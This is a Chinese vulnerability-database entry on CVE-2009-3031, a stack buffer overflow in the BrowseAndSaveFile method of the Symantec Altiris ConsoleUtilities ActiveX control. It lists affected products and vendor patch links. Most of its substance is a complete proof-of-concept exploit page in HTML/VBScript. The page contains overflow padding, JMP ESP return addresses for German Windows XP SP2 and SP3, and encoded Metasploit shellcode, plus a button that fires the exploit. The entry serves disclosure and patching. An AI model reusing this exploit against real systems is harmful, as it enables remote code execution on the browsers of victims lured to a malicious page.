Symantec Altiris ConsoleUtilities ActiveX控件缓冲区溢出漏洞

基本字段

漏洞编号：: SSV-12580

披露/发现时间：: 未知

提交时间：: 2009-11-05

漏洞等级：

漏洞类别：: 远程溢出

影响组件：: Symantec AntiVirus
(6,6,6,7)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

Bugraq ID: 36698 CVE ID：CVE-2009-3031 Symantec Altiris Deployment Solution是自动化的操作系统部署解决方案，用于从统一的位置部署和管理服务器、桌面和笔记本等。在初次访问Altiris Deployment Solution等产品管理服务器的管理WEB站点时会安装一个ActiveX控件(AeXNSConsoleUtilities.dll)，此函数"BrowseAndSaveFile"存在一个基于栈的缓冲区溢出： Name: ConsoleUtilities Class Vendor: Altiris, Inc. Type: ActiveX-Steuerelement Version: 6.0.0.1846 GUID: {B44D252D-98FC-4D5C-948C-BE868392A004} File: AeXNSConsoleUtilities.dll Folder: C:\WINDOWS\system32 提交超长的字符串作为"BrowseAndSaveFile"函数的参数，可触发基于栈的缓冲区溢出，攻击者构建恶意WEB页，诱使用户解析可以应用程序权限执行任意指令。 Altiris Deployment Solution 6.x Altiris Notification Server 6.x Symantec Altiris ConsoleUtilities ActiveX Control 6.x Symantec Management Platform 7.x 用户可参考如下供应商提供的升级程序：、Symantec Altiris Deployment Solution 6.9 SP1 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9 SP3 Build 430 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9.164 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9.176 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9.355 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568 Symantec Altiris Deployment Solution 6.9.355 SP1 Symantec AltirisNSConsole.zip https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.1KB

<html> <title>NSOADV-2009-001</title> <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/> </object> <script language='vbscript'> Sub Submit_OnClick For i=0 to 2 If document.ret.os(i).checked Then target=document.ret.os(i).value End If Next EIP=unescape(target) arg1 = "" arg3 = "" arg4 = "" arg5 = "" junk=String(310, "A") 'junk morejunk=String(18, unescape("%u0041")) 'more junk // windows/exec - 224 bytes // http://www.metasploit.com // Encoder: x86/call4_dword_xor // EXITFUNC=seh, CMD=calc.exe code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_ "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_ "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_ "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_ "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_ "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_ "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_ "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_ "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_ "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_ "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_ "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_ "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_ "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848") buf=junk+EIP+morejunk+break+code obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5 End Sub </script> <h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2> Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br> <h3>Some RET Infos:</h3> Overwrite EIP with AAAA (crash)<br> EIP=String(2, unescape("%u4141"))<br><br> XP SP2 Ger shell32.dll JMP ESP<br> EIP=unescape("%uaf0a%u77d5")<br><br> XP SP3 Ger shell32.dll JMP ESP<br> EIP=unescape("%u30D7%u7E68")<br><br> ---------------------------------------------------------------- <form name="ret"> <input type=radio name="os" value="%u4141%u4141"> DoS<br> <input type=radio name="os" value="%uaf0a%u77d5"> Windows XP SP2 German<br> <input type=radio name="os" value="%u30D7%u7E68"> Windows XP SP3 German<br> <input type=button name="Submit" VALUE="Exploit"> </form> <img src="http://sotiriu.de/images/logo_wh_80.png"> </html>

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

Symantec Altiris ConsoleUtilities ActiveX控件缓冲区溢出漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Symantec Altiris ConsoleUtilities ActiveX控件缓冲区溢出漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定